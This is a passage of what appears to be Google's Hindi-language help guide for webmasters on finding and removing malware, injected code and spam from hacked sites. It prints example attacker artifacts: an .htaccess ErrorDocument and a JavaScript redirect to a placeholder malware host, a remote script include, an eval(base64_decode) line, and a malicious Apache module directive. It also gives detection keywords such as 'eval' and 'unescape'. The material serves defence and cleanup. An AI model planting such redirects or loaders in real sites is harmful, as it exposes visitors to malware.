    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

साइट पर मौजूद उन सभी कोड की जाँच करें जो नुकसान पहुंचा सकते हैं. iframe कोड ढूंढने के लिए "iframe" जैसे शब्दों को खोजने से मदद मिल सकती है. "script", "eval", और "unescape" जैसे दूसरे कीवर्ड से भी मदद मिल सकती है. उदाहरण के लिए, Unix पर चलने वाले सिस्टम पर "iframe" को सभी फ़ाइलों में खोजने के लिए:

$grep -irn "iframe" ./ | less

2. अपनी साइट से मैलवेयर निकालें

जब आप अपनी साइट से मैलवेयर निकालने को तैयार हो जाएं तब आप उन फ़ाइलों को सुरक्षित बैकअप से बदल सकते हैं जिसमें समस्या है. इसके अलावा, आप हर एक पेज और उससे जुड़े स्क्रिप्टिंग फंक्शन या फ़ाइलों से कोड इंजेक्शन वाले मैलवेयर निकाल सकते हैं. अगर आप सर्वर कॉन्फ़िगरेशन वाली फ़ाइलों में बदलाव करते हैं, तो उन बदलावों को सही तरीके से लागू करने के लिए आपको अपने वेबसर्वर को रीस्टार्ट करना पड़ सकता है.

इसके अलावा:

मैलवेयर का प्रकार: गड़बड़ी वाले टेम्पलेट

समस्या के बारे में जानकारी

404 फ़ाइल नहीं मिला जैसे गड़बड़ी का मैसेज दिखाने के लिए इस्तेमाल होने वाले टेम्पलेट को मैलवेयर पहुंचाने के लिए कॉन्फ़िगर किया जाता है. इस तरह, हमलावर उन यूआरएल पर भी हमला कर सकते हैं जो आपकी साइट पर मौजूद भी नहीं हैं.

समस्या को ठीक करना

1. पता करें कि समस्या क्या है

अपनी साइट पर ऐसे पेज को खोलने का अनुरोध करें जो मौजूद नहीं है या फिर उस पेज को खोलने पर दूसरी तरह की गड़बड़ी मिलती है. खोले गए पेज की जाँच करें कि क्या यह किसी दूसरी साइट का पेज है या उस पेज पर कोई मैलवेयर मौजूद है.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. अपनी साइट से मैलवेयर निकालें

अपने वेबसर्वर में लॉग इन करें और सर्वर के कॉन्फ़िगरेशन की फ़ाइलों में गड़बड़ी वाले पेजों के डायरेक्टिव को खोजें. उदाहरण के लिए, Apache वेबसर्वर के लिए गड़बड़ी वाले टेम्पलेट .htaccess वाली फ़ाइल में मौजूद हो सकते हैं. यहां एक .htaccess वाली फ़ाइल की एंट्री का उदाहरण दिया गया है जो किसी मैलवेयर वाले साइट से 404 गड़बड़ी कोड वाले पेजों को एक्सेस करता है.

ErrorDocument 404 http://<malware-site>/index.html 

जब आप अपनी साइट से मैलवेयर निकालने को तैयार हो जाएं तब आप .htaccess की फ़ाइल (फ़ाइलों) को सुरक्षित बैकअप से बदल सकते हैं. इसके अलावा, आप मौजूदा .htaccess की फ़ाइल (फ़ाइलों) से वैसे ErrorDocument के डायरेक्टिव को मिटा सकते हैं जिनकी ज़रूरत नहीं है. अगर आपकी साइट पर गड़बड़ी वाली फ़ाइलें मौजूद हैं, तो उन्हें भी हटा दें. सभी बदलावों को लागू करने के लिए आखिर में वेबसर्वर को रीस्टार्ट करना ज़रूरी है.

इसके अलावा:

मैलवेयर का प्रकार: क्रॉस-साइट मैलवेयर

समस्या के बारे में जानकारी

यह साइट एक ऐसी वेबसाइट से सामग्री लोड कर रही है जिसमें मैलवेयर वाली सामग्री मौजूद है. मैलवेयर वाली सामग्री रखने वाली वेबसाइट के बारे में जानकारी देने के लिए Chrome में नीचे दिए गए ग्राफ़िक का इस्तेमाल होता है. ये ग्राफ़िक मुख्य पेज के खुलने से पहले नज़र आता है:

cross-site malware warning

समस्या को ठीक करना

  1. सुरक्षा की समस्याओं वाली रिपोर्ट में यूआरएल के नमूनों की सूची दी गई है. इनमें से कुछ यूआरएल को ब्राउज़ करके पता करें कि समस्या क्या है. अगर ये क्रॉस-साइट मैलवेयर की समस्या है, तो आपको ऊपर दिया गया ग्राफ़िक दिखाई देगा.
  2. ब्राउज़र चेतावनी की मदद से आपको आपत्तिजनक सामग्री के डोमेन के बारे में पता चल जाएगा. ब्राउज़र चेतावनी में जिस साइट को आपत्तिजनक पाया गया है उससे जुड़ी सभी सामग्रियों को अपनी साइट से हटा दें.
  3. आपको पता चलता है कि आपकी साइट पर मौजूद कोई पेज आपत्तिजनक साइट से सामग्री ले रहा है. साथ ही, अगर इस बारे में आपको पहले से कोई जानकारी नहीं थी, तो यह और भी गंभीर समस्या है और यह मुमकिन है कि आपकी साइट मैलवेयर के हमले की शिकार हो चुकी है. समस्या कोई भी हो, Google सुझाव देता है कि हैक की गई सामग्री को दोबारा ठीक करने के लिए दी गई गाइड पढ़ें. इस गाइड में साइट को फिर से सुरक्षित करने के लिए बनाए गए प्रोटोकॉल शामिल हैं. इन प्रोटोकॉल की मदद से आप अपनी साइट को क्‍वारंटाइन कर सकते हैं, मैलवेयर के हमले से हुए नुकसान की समीक्षा कर सकते हैं और साइट से मैलवेयर निकाल सकते हैं.
  4. अपनी साइट से साेशल इंजीनियरिंग की सभी सामग्री हटाने के बाद आप सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा करने का अनुरोध कर सकते हैं. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
  5. आपने जानबूझकर किसी ऐसी आधिकारिक साइट से सामग्री ली है जिसे आपत्तिजनक पाया गया है. साथ ही, आप उस साइट से मैलवेयर हटने के बाद फिर से सामग्री लेना चाहते हैं तो आप उस साइट की स्थिति पर नज़र रख सकते हैं. उस साइट पर नज़र रखने के लिए आप Google सुरक्षित ब्राउज़िंग के डायग्नोस्टिक पेज का इस्तेमाल कर सकते हैं (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). आम तौर पर आधिकारिक साइटों के मालिक अपनी साइटों से मैलवेयर निकालने में ज़्यादा देर नहीं करते हैं.
मैलवेयर के और प्रकार

कई दूसरे मैलवेयर भी हैं जो आपकी साइट को नुकसान पहुंचा सकते हैं. हैक करने के दूसरे तरीकों का पता लगाने और उन्हें ठीक करने के सुझाव पाने के लिए वेब की बुनियादी बातों की साइट देखें. अपनी साइट को ठीक करने के बाद सुरक्षा की समीक्षा का अनुरोध जरूर करें.

3. सुरक्षा की समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

हैक की गई सामग्री का प्रकार: कोड इंजेक्शन

हैकर की वजह से आपकी साइट मैलवेयर के हमले की शिकार हो चुकी है. हैकर आपकी साइट के पेजों में मैलवेयर वाले कोड डाल रहा है. इसके उदाहरण में मैलवेयर साइट की ओर रीडायरेक्ट करना शामिल है. इसके अलावा, पेज खुले रहने के दौरान आपके ब्राउज़र पर क्रिप्टोकरेंसी की माइनिंग करने वाला सॉफ़्टवेयर चलाना भी शामिल है.

1. समस्या को ठीक करने का तरीका

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

2. पता करें कि समस्या क्या है

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

हैकर ने मैलवेयर वाले कोड को सीधे आपकी साइट के एचटीएमएल वाली फ़ाइलों में डाला होगा (उदाहरण के लिए, JavaScript से रीडायरेक्ट करने वाले कोड जोड़ना). इसके अलावा, हैकर आपकी साइट की सामग्रियों को जेनरेट करने वाली फ़ाइलों में भी मैलवेयर वाले कोड डाल सकता है (उदाहरण के लिए, पीएचपी फ़ाइलें).

सुरक्षा की समस्याओं वाली रिपोर्ट में शामिल मैलवेयर के हमले का शिकार हो चुके पेज को फ़ेच करें और मिलने वाले जवाब की जाँच करें. हैकर आपकी साइट पर आने वाले उपयोगकर्ताओं को अपनी साइट पर रीडायरेक्ट करने के लिए कई तरीकों का इस्तेमाल कर सकता है. नीचे ऐसे ही कुछ तरीके दिए गए हैं:

  • रीडायरेक्ट करना:​
    • हैडर की मदद से रीडायरेक्ट करना: हैकर आपकी साइट के सर्वर के कॉन्फ़िगरेशन वाली फ़ाइल (फ़ाइलों) को बदल कर आपकी साइट पर आने वाले उपयोगकर्ताओं को रीडायरेक्ट कर सकते हैं. आमतौर पर, सर्वर की कॉन्फ़िगरेशन वाली फ़ाइलें इस्तेमाल करके, साइट का एडमिन यह तय कर सकता है कि यूआरएल रीडायरेक्ट उपयोगकर्ता को वेबसाइट के किन खास पेजों या डायरेक्ट्री पर ले जाए. उदाहरण के लिए, Apache सर्वर पर htaccess फ़ाइल और httpd.conf दोनों ही सर्वर के कॉन्फ़िगरेशन वाली फ़ाइलें हैं.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • JavaScript से रीडायरेक्ट करना:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • मैलवेयर वाली ऐसी JavaScript जो किसी दूसरी साइट से लोड की गई हैं:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • शेयर की गईं ऐसी ऑब्जेक्ट फ़ाइलें जिन्हें आम तौर पर सुरक्षित माने जानी वाली स्क्रिप्ट से छेड़छाड़ करने के लिए बनाया जाता है. ये फ़ाइलें इस्तेमाल करके नुकसान पहुंचाने वाले कोड को बिना किसी तय तरीके के स्क्रिप्ट में डाला जाता है:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

अपनी साइट पर या फिर सर्वर पर कोई भी अनुरोध करने पर मिलने वाले जवाबों में संदिग्ध कोड ढूंढें. "search", "eval", "base64_decode", और "unescape" जैसे शब्दों को खोजने से मदद मिल सकती है.

3. अपनी साइट से मैलवेयर निकालना

अपनी साइट से मैलवेयर निकालने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैकअप के तौर पर पहले सेव की गईं बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाली सामग्री हटा सकते हैं.

इसके अलावा:

4. समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

हैक की गई सामग्री का प्रकार: हैक करने के लिए इस्तेमाल की जाने वाली सामग्री

हैकर आपकी साइट के पेजों में स्पैम वाले लिंक या टेक्स्ट शामिल कर सकते हैं. हैक करने के लिए इस्तेमाल की जाने वाली सामग्री में दवाओं के नाम या स्पैम वाली दूसरी ऐसी सामग्रियां शामिल हो सकती हैं जो साइट की सामग्री से अलग हों.

आम तौर पर, हैकर इनमें से किसी एक तरीके से आपकी साइट में बदलाव करते हैं:

  • आपके सर्वर पर किसी असुरक्षित डायरेक्ट्री का एक्सेस पाकर. उदाहरण के लिए, हो सकता है कि आपने अनजाने में किसी ऐसी डायरेक्ट्री का इस्तेमाल कर लिया हो जिसे कोई भी व्यक्ति देख सकता है.
  • आपकी साइट पर चल रहे सामग्री प्रबंधन सिस्टम जैसे सॉफ़्टवेयर की कमियों का फ़ायदा उठाकर. उदाहरण के लिए, हो सकता है कि आप Drupal, Joomla या WordPress के किसी पुराने, असुरक्षित वर्शन का इस्तेमाल कर रहे हों.
  • विज़िटर काउंटर जैसे तीसरे पक्ष के किसी ऐसे प्लग इन को हैक करके, जिसे आप अपनी साइट पर इस्तेमाल करते हैं.

1. समस्या को ठीक करने का तरीका

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

2. समस्या की पुष्टि करना

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

अपनी साइट के कुछ पेज फ़ेच करें और ऐसी संदिग्ध सामग्री या लिंक की जाँच करें जिन्हें आपने नहीं जोड़ा है. उदाहरण के लिए, दवाओं के नाम या स्पैम वाले शब्द जैसे कि "viagra" या "earn money" खोजें.

3. अपनी साइट से मैलवेयर निकालना

अपनी साइट से मैलवेयर निकालने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैकअप के तौर पर पहले सेव की गईं बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या हर पेज से स्पैम वाली सामग्री और लिंक हटा सकते हैं. अच्छी तरह जाँच लें कि सुरक्षा की समस्याओं वाली रिपोर्ट में दी गईं साइट हैक किए जाने की सभी तरह की समस्याएं ठीक कर ली गई हों. इसके अलावा, आप Google पर “site:” खोज सुविधा का इस्तेमाल करके और अपनी वेबसाइट पर सोर्स फ़ाइल खोजकर, यह पता लगा सकते हैं कि आपकी साइट के किन पेजों को हैक किया गया है.

इसके अलावा:

4. समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

हैक की गई सामग्री का प्रकार: हैक करने के लिए इस्तेमाल किया जाने वाला यूआरएल

हैकर अक्सर आपकी साइट पर ऐसे नए पेज जोड़ता है जिनमें स्पैम वाले शब्द या लिंक होते हैं. कभी-कभी इन नए पेजों में ऐसा कोड होता है जिससे आपकी साइट पर गलत असर पड़ता है, जैसे कि आपके उपयोगकर्ताओं को दूसरी साइटों पर ले जाना या दूसरी साइटों के ख़िलाफ़ सेवा में रुकावट के हमले में आपके वेबसर्वर को शामिल करना.

1. समस्या को ठीक करने का तरीका

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

2. समस्या की पुष्टि करना

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

यह देखने के लिए कि आपका बनाया गया कोई पेज Google पर मौजूद है या नहीं, रिपोर्ट में उदाहरण के तौर पर दिए गए यूआरएल को खोजकर देखें. अगर आपने ये पेज नहीं बनाए हैं, तो आपको अपनी साइट से इन पेजों को हटाना होगा या फिर अपने आप पेज जेनरेट करने वाले कोड को हटाना होगा. अपनी साइट पर इन पेजों को ढूंढने और हटाने का तरीका जानने के लिए यह पढ़ें.

आप “site:” खोज सुविधा का इस्तेमाल करके भी ऐसे पेज खोज सकते हैं, जिन्हें आपने नहीं बनाया है.

  • यह जानने के लिए कि किसी छोटी साइट पर बनाया गया आपका पेज उस पर मौजूद है या नहीं, आप ऐसे पेजों की सूची देख सकते हैं जिन्हें हमने इंडेक्स किया है. इसके लिए 'Google सर्च' में [site:example.com] खोजें.
  • बड़ी साइटों के लिए, आप ज़्यादा खास तरह की क्वेरी इस्तेमाल कर सकते हैं. उदाहरण के लिए, यहां देखें:
    • [site:example.com pharmacy] - example.com पर "pharmacy" शब्द वाले सभी पेजों की सूची बनाएं. इसकी जगह दूसरे सामान्य स्पैम वाले शब्दों को खोजकर देखें.
    • [site:example.com/wp-admin/] - अपनी WordPress साइट के साइट व्यवस्थापक सेक्शन में सभी पेजों की सूची बनाएं.

3. अपनी साइट से मैलवेयर निकालना

अपनी साइट से मैलवेयर निकालने के लिए, आप मैलवेयर वाली डायरेक्ट्री को हटा सकते हैं. साथ ही, आप उसकी जगह बैकअप के तौर पर पहले सेव की गई बिना मैलवेयर वाली डायरेक्ट्री इस्तेमाल कर सकते हैं या फिर आप ऐसे अनचाहे पेजों, फ़ाइलों या फ़ंक्शन को हटा सकते हैं जिनका इस्तेमाल करके हैकर ने डायरेक्ट्री बनाई हो.

इसके अलावा:

4. समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

असामान्य रूप से डाउनलोड होने वाली फ़ाइलें

आपकी साइट पर ऐसी फ़ाइलें मिल सकती हैं, जिनकी Google सुरक्षित ब्राउज़िंग से पहचान न हो पाए. ऐसे में Chrome ब्राउज़र यह चेतावनी दे सकता है कि ये फ़ाइलें असामान्य रूप से डाउवलोड हुई हैं और इनसे आपकी साइट को खतरा हो सकता है. अगर Google सुरक्षित ब्राउज़िंग से यह पुष्टि हो जाती है कि मौजूदा फ़ाइलें सुरक्षित हैं, तो ये चेतावनियां अपने आप हटा दी जाएंगी.

1. समस्या ठीक करना

इस बात का पता लगाएं और पुष्टि करें कि आपकी डाउनलोड की गईं फ़ाइलें, डाउनलोड करने के दिशा-निर्देशों के मुताबिक हैं या नहीं. अगर डाउनलोड की गई कोई भी फ़ाइल इन दिशा-निर्देशों का उल्लंघन करती है, तो उसे हटा दें. अगर फ़ाइल इन दिशा-निर्देशों का उल्लंघन नहीं करती, तो उसे हटाने की ज़रूरत नहीं है. ऐसे में, बस नीचे बताए गए तरीके से समीक्षा के लिए अनुरोध मांग करें. ध्यान दें कि इस समस्या के लिए, हमेशा उदाहरण के तौर पर यूआरएल नहीं दिए जाते.

2. समीक्षा के लिए अनुरोध करें

जब आप फ़ाइलें हटा लें (या यह पुष्टि कर लें कि आपकी डाउनलोड की गईं फ़ाइलें, दिशा-निर्देशों के मुताबिक सही हैं), तो सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा करने के लिए कहें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

नुकसान पहुंचाने वाली फ़ाइलें

आपकी साइट पर ऐसी फ़ाइलें मिल सकती हैं जिनकी Google सुरक्षित ब्राउज़िंग से मैलवेयर या अनचाहे सॉफ़्टवेयर के तौर पर पहचान होती है. उपयोगकर्ता के आपकी साइट पर आने पर, Chrome ब्राउज़र चेतावनी दिखा सकता है. आपको चेतावनी हटाने के लिए अपनी साइट से ये डाउनलोड हटाने होंगे.

1. समस्या का आकलन करना

अगर ये फ़ाइलें जानबूझकर डाउनलोड की गई हैं, तो इन्हें अपनी साइट से हटा दें और सीधे समीक्षा के लिए अनुरोध करें पर जाएं.

अगर आपको साइट पर मौजूद इन फ़ाइलों के बारे में जानकारी नहीं है, तो हो सकता है कि आपकी साइट हैक कर ली गई हो. अपनी हैक की गई साइट की समस्या हल करने के लिए, इन फ़ाइलों को ढूंढें और अपनी साइट से हटा दें.

2. समस्या को ठीक करने का तरीका

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

3. समस्या की पुष्टि करना

असामान्य रूप से डाउनलोड होने वाली फ़ाइलों की पुष्टि करने के लिए, अपनी साइट के कुछ पेजों की अच्छी तरह जाँच कर लें.

4. अपनी साइट से मैलवेयर निकालना

